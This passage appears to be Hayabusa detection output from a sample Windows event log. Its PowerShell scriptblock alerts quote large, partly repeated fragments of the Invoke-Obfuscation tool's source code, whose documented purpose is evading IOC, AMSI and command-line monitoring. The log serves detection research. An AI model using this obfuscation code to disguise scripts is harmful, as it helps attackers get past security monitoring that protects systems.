-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. 
If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. 
$ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated.
If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. 
$ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
